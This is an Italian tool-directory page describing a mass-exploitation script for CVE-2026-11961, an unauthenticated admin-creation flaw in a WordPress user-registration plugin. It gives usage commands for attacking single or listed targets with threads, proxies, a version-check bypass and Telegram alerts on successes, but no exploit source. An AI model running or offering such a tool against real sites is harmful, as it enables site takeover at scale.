Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalation dei privilegi. Ruoli di appartenenza configurati male → Creazione admin non autenticata → Compromissione del sito. CVSS 8.1 | Kitploit
Strumenti/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
Escalation di PrivilegiScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingConfigurazione Errata

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
johenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalation dei privilegi. Ruoli di appartenenza configurati male → Creazione admin non autenticata → Compromissione del sito. CVSS 8.1

Vedi Repository
171 mese faNon ancora revisionato

CVE-2026-11961

Strumento per exploit di massa per CVE-2026-11961 che colpisce il plugin WordPress User Registration & Membership.

Caratteristiche

  • Rilevamento della versione del plugin
  • Supporto per singolo target
  • Elaborazione batch di target
  • Supporto multi-thread
  • Credenziali casuali o personalizzate
  • Supporto proxy HTTP/HTTPS
  • Configurazione del timeout delle richieste
  • Output JSONL
  • Supporto file di log
  • Notifiche Telegram
  • Modalità forzata (--force)

Utilizzo

root@kitploit:~
# Show help
python3 mass.py -h

# Single target
python3 mass.py -u https://target.com

# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Multiple targets
python3 mass.py -l targets.txt -t 20

# Save successful results
python3 mass.py -l targets.txt -o results.jsonl

# Write log file
python3 mass.py -l targets.txt --log exploit.log

# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Force mode
python3 mass.py -u https://target.com --force

Opzioni

Disclaimer

Questo progetto è fornito esclusivamente per valutazioni di sicurezza autorizzate, ricerca di sicurezza difensiva e validazione delle vulnerabilità.

Utilizzando questo software, confermi di avere esplicita autorizzazione a valutare i sistemi target. L'accesso non autorizzato ai sistemi informatici è proibito e potrebbe violare le leggi applicabili.

L'autore e i contributori non incoraggiano né approvano l'uso non autorizzato di questo progetto e declinano qualsiasi responsabilità o obbligo per qualsiasi uso improprio, danno o conseguenza legale derivante dal suo utilizzo.

Autore

JohenLastGen JLG NETWORK

Scarica lo strumento
OpzioneDescrizione
-h, --helpMostra il messaggio di aiuto ed esci
-u, --urlURL di un singolo target
-l, --listFile contenente gli URL dei target (uno per riga)
--usernameNome utente amministratore (predefinito: generato casualmente)
--passwordPassword amministratore (predefinita: generata casualmente)
-t, --threadsNumero di thread concorrenti (predefinito: 5)
--timeoutTimeout delle richieste in secondi (predefinito: 15)
-o, --outputSalva i risultati riusciti in un file JSONL
--logSalva i log della console in un file
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--forceSalta la validazione della versione e continua l'elaborazione
--tg-tokenToken del Bot Telegram
--tg-chatID della chat Telegram